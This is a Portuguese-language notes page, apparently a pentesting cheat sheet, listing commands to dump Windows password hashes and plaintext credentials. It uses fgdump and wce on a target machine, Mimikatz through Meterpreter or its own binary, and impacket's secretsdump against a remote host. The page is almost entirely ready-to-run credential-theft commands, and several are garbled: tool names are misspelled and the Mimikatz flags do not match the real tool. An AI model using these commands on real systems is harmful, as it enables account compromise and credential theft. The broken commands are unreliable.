Área exclusiva para comandos para quebrar senhas de Linux e Windows. Para saber mais sobre os conceitos, acesse [[Hashs]]. Realizar a busca de credenciais ```shell # apt install windows-binaries no Kali # Realizar a busca de hashs de usuários em cache no Windows. /usr/share/windows-binaries/fgdump/fgdump.exe # Carregar na maquina alvo e depois executar. Vai gerar dois arquivos de texto. ``` Outra forma usando outro binário. ```shell # apt install windows-binaries no Kali. # Realizar a busca de hashs na maquina local mostrando a senha em texto puro. /usr/share/windows-binaries/wce-universal.exe -w /usr/share/windows-binaries/wce64.exe -w # Com opção -w vai permitir buscar as senhas em texto puro. ``` Também é possível fazer via meterpreter. ```powershell # Carregar o modulo mimikatz no Meterpreter. meterpreter> load minikatz meterpreter> wdigest # Ou usando o próprio binário do mimikatz CMD:/> minikatz.exe -f sekurlsa::wdigest -a full CMD:/> minikatz.exe -f sekurlsa::searchPasswords CMD:/> minikatz.exe -f sekurlsa::logonPasswords ``` Também podemos tentar realizar o dump de hashs remotamente: ```shell # Realizando o dump de senhas remotamente. $ impacket-secrests-dump user:password@IP ``` Saiba mais sobre a [[Quebra de Senhas]]